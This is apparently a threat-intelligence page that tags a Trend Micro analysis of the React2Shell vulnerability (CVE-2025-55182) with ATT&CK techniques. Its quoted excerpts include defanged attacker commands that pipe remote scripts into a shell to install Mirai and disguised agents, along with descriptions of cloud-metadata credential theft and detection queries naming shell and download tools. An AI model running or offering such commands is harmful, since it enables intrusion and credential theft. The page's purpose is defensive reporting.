TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Trend Micro Research

CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation

Ashish Verma · 2025-12-10

ATT&CK techniques detected

16 predictions (technique, then classifier confidence, then the excerpt that triggered it; excerpts are fragments of the original article and are de-tokenized here, with defanged indicators kept as published)

T1552.005 Cloud Instance Metadata API (89%)
“uses discovered AWS credentials to list and scan S3 buckets accessible to the host. - Directories: /tmp, /var/www, /opt, /etc, and user home directories. Cloud metadata harvesting: the script aggressively targets cloud instance metadata services (IMDS) to steal temporary …”

T1574.006 Dynamic Linker Hijacking (89%)
“root access. To maintain control, it clears competing cron jobs and installs its own to re-download the payload every minute from 80.64.16[.]241. It disables firewalls (ufw/iptables), removes file immutability flags, and attempts to preload a malicious shared library w…”

T1190 Exploit Public-Facing Application (89%)
“.]cc as a C&C server. Windows exploitation attempts: during our threat hunting activities, we observed Windows devices being targeted with exploitation attempts. In most cases, it looked like scanning activity, as the commands were aimed at Unix/Linux hosts and attempted to …”

T1543.002 Systemd Service (83%)
“]205/s | sh. This script downloads and executes a binary called "ntpclient" (mimicking legitimate NTP client software) from hxxp://38.165.44[.]205/1, along with a configuration file, runs it in the background with all output suppressed, and establishes persisten…”

T1059.001 PowerShell (81%)
“lepath: "/more" or objectfilepath: "/less" or objectfilepath: "/base64" or objectfilepath: "/perl" or objectfilepath: "/python" or objectfilepath: "/ruby" or objectfilepath: "/node" or objectfilepath: "/java" or objectfilepath: "/nohup" or ob…”

T1053.005 Scheduled Task (78%)
“powershell_ise.exe" or processfilepath: "*\pwsh.exe" or processfilepath: "*\wscript.exe" or processfilepath: "*\cscript.exe" or processfilepath: "*\mshta.exe" or processfilepath: "*\rundll32.exe" or processfilepath: "*\regsvr32.exe" or proc…”

T1190 Exploit Public-Facing Application (77%)
“observed. Enterprises can use the IoC table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window. According to Trend Micro telemetry, there was a notable surge in exploitation attempts between Decembe…”

T1190 Exploit Public-Facing Application (77%)
“connection to the controller. Once enrolled, the agent periodically reports host telemetry such as CPU, memory, disk, uptime, and network stats, along with healthcheck results. Nezha itself is benign, but in this case, the covert installation, the use of a direct IP, disabled TLS…”

T1055.001 Dynamic-link Library Injection (64%)
“\curl.exe" or processfilepath: "*\wget.exe" or processfilepath: "*\ftp.exe" or processfilepath: "*\tftp.exe") - nodejs spawning reconnaissance and network tools - Windows eventsubid: 2 and parentfilepath: "*\node.exe" and (processfilepath: "*\who…”

T1190 Exploit Public-Facing Application (62%)
“and automated mass-scanning. - Trend™ Research observed that CVE-2025-55182, as of this writing, is being exploited in-the-wild, and in several malware campaigns such as the Emerald and Nuts campaigns. Several of these are attacks that execute Cobalt Strike beacons gene…”

T1588.006 Vulnerabilities (53%)
“observed. Enterprises can use the IoC table to update their respective threat feeds, and the timeline to assess if their organization was exposed during the exploitation window. According to Trend Micro telemetry, there was a notable surge in exploitation attempts between Decembe…”

T1059.004 Unix Shell (53%)
“]150/nuts/bolts -o- | sh)' Alternative method: downloads Mirai variant via shell script. curl -s hxxp://193[.]34[.]213[.]150/nuts[.]sh | bash This campaign deploys a Mirai-based botnet variant using multiple download and execution techniques, levera…”

T1059.004 Unix Shell (41%)
“/bin/sh -c curl -L https://raw.githubusercontent.com/nezhahq/scripts/main/agent/install.sh -o agent.sh && chmod +x agent.sh && env NZ_SERVER=107.174.123.91:11451 NZ_TLS=false NZ_CLIENT_SECRET=[REDACTED] ./agent.sh This oneliner d…”

T1555.006 Cloud Secrets Management Stores (41%)
“uses discovered AWS credentials to list and scan S3 buckets accessible to the host. - Directories: /tmp, /var/www, /opt, /etc, and user home directories. Cloud metadata harvesting: the script aggressively targets cloud instance metadata services (IMDS) to steal temporary …”

T1059.004 Unix Shell (39%)
“]205/s | sh. This script downloads and executes a binary called "ntpclient" (mimicking legitimate NTP client software) from hxxp://38.165.44[.]205/1, along with a configuration file, runs it in the background with all output suppressed, and establishes persisten…”

T1190 Exploit Public-Facing Application (36%)
“backdoored tools establish persistence on your scanning infrastructure - attacker reconnaissance. Your target list becomes their target list - time wasted. Security teams spend cycles on non-functional tools while real exploitation continues. Verified legitimate proof-of-con…”

Summary

CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proofs-of-concept, scanners and exploits, and the widespread misconceptions that came with them, this technical analysis sets out to cut through the noise.